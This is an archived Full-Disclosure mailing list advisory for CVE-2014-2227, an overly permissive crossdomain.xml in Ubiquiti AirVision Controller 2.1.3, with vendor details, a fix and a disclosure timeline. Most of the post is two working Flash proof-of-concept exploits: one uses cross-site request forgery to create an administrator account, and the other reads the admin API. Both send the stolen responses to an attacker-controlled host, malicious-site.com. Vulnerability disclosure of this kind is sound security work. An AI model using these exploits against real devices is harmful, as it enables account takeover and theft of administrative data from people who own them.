lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAOzeT81wgm8ZB6MRhOe8c6cVFEO=6xSFaw=S_Cff8VF37ViB2w@mail.gmail.com>
Date: Thu, 24 Jul 2014 00:01:11 -0400
From: Seth Art <sethsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CVE-2014-2227: Ubiquiti Networks - AirVision v2.1.3 - Overly
 Permissive default crossdomain.xml

-----------
Vendor:
-----------
Ubiquiti Networks (http://www.ubnt.com/)

----------------------------------------------
Affected Products/Versions:
----------------------------------------------
AirVision Controller v2.1.3
Note: Previous versions may be affected

-----------------
Description:
-----------------
Title: Overly Permissive default crossdomain.xml file
CVE: CVE-2014-2227
CWE: http://cwe.mitre.org/data/definitions/264.html
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2227.html
Researcher: Seth Art - @sethsec

------------------------------------------------------------------------------------------------------
POC #1: Using crossdomain.xml to execute CSRF and add an  administrator:
------------------------------------------------------------------------------------------------------

// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
(https://github.com/gursev/flash-xdomain-xploit)
package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;
 import flash.net.URLRequestHeader;

 public class XDomainXploit3 extends Sprite {
  public function XDomainXploit3() {
   // Target URL from where the data is to be retrieved
   var readFrom:String = "https//victim:7443/api/2.0/admin";
   var header:URLRequestHeader = new URLRequestHeader("Content-Type",
"text/plain; charset=UTF-8");
   var readRequest:URLRequest = new URLRequest(readFrom);
   readRequest.method = URLRequestMethod.POST
   readRequest.data =
"{\"name\":\"csrf-cdp\",\"email\":\"csrf-cdp@...il.com\",\"userGroup\":\"admin\",\"x_password\":\"password\",\"confirmPassword\":\"password\",\"disabled\":false}";
   readRequest.requestHeaders.push(header);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
    getLoader.load(readRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }


  private function eventHandler(event:Event):void {
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php"
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
    sendLoader.load(sendRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }
 }
}

-----------------------------------------------------------------------
POC #2: Using crossdomain.xml to exfiltrate log data:
-----------------------------------------------------------------------

// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
(https://github.com/gursev/flash-xdomain-xploit)
package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;


 public class XDomainXploit extends Sprite {
  public function XDomainXploit() {
   // Target URL from where the data is to be retrieved
   var readFrom:String = "/victim:7443/api/2.0/admin";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
    getLoader.load(readRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }


  private function eventHandler(event:Event):void {
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://www.malicious-site.com/admin"
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
    sendLoader.load(sendRequest);
   } catch (error:Error) {
    trace("Error loading URL: " + error);
   }
  }
 }
}

-------------
Solution:
-------------
AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
The application name changed from AirVision to UniFi Video)

-----------------------------
Disclosure Timeline:
-----------------------------

2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product
2014-02-19: Ubiquti confirms receipt of AirVision report and existence
of the vulnerability
2014-02-28: CVE-2014-2227 assigned
2014-03-12: Requested status update
2014-03-27: Requested status update
2014-04-07: Requested status update
2014-04-09: Ubiquiti provides timeline for solution
2014-04-18: UniFi Video 3.0.1 is released
2014-06-13: Set public disclosure date of 2014-07-24
2014-07-24: Public disclosure

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ